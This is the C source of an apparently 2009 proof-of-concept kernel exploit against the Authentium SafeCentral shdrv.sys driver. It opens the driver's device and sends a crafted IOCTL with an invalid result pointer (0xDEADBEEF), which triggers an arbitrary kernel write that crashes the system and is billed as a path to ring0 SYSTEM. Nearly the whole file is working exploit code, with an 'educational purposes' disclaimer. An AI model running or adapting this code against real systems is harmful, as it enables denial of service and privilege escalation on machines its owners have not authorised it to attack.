|
/* safecentral-unharden.c
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM POC
* by mu-b - Tue 1 Sep 2009
*
* - Tested on: shdrv.sys 2.0.0.128
*
* Compile: MinGW + -lntdll
*
* - this exploit is provided for educational purposes _only_. You are free
* to use this code in any way you wish provided you do not work for, or
* are associated in any way with Portcullis Computer Security Ltd.
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define SAFECNTRL_IOCTL 0x00226003
struct ioctl_req {
DWORD action;
DWORD *args;
DWORD *result;
};
int
main (int argc, char **argv)
{
struct ioctl_req req;
HANDLE hFile, hEvent;
OVERLAPPED olStruct;
BOOL bResult;
DWORD args[2], rlen;
printf ("Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
fflush (stdout);
hFile = CreateFileA ("\\\\.\\ShDev", GENERIC_READ,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
memset (&req, 0, sizeof req);
req.action = 8;
req.args = args;
req.result = (DWORD *) 0xDEADBEEF;
memset (&olStruct, 0, sizeof olStruct);
olStruct.hEvent = CreateEventW (NULL, TRUE, FALSE, NULL);
if (!olStruct.hEvent)
{
fprintf (stderr, "* CreateEventW failed\n");
exit (EXIT_FAILURE);
}
bResult = DeviceIoControl (hFile, SAFECNTRL_IOCTL,
&req, sizeof req, NULL, 0, &rlen, &olStruct);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
bResult = GetOverlappedResult (hFile, &olStruct, &rlen, 1);
if (!bResult)
{
fprintf (stderr, "* GetOverlappedResult failed\n");
exit (EXIT_FAILURE);
}
printf ("* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
|
推荐
评论(0条)
